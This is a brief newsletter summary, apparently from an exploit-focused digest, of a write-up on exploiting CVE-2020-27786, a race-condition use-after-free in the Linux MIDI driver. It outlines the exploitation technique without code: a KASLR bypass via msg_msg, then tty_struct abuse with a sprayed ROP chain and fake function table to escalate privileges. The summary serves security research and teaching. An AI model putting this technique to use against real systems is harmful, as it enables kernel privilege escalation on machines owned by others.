tags:linuxkerneluafrace_conditionrop original link: CVE-2020-27786 (Race Condition + Use-After-Free) newsletter link: exploits.club Weekly Newsletter 37 - Juicy Overflows, The Art Of Exploitation, Rust in Firmware, and More


Exploits Club Summary:

We love a post that talks methodology, but we also love a post that gets right into the nitty details. This new one from @ii4gsp is very much the latter, walking through his exploit technique for CVE-2020-27786, a use-after-free caused by a race condition in Linux’s MIDI driver. The post quickly discusses the root cause and the patch before diving into exploitation. He bypassed KASLR with msg_msg and used tty_struct in combination with the spray of a ROP chain and fake function table to successfully escalate privileges.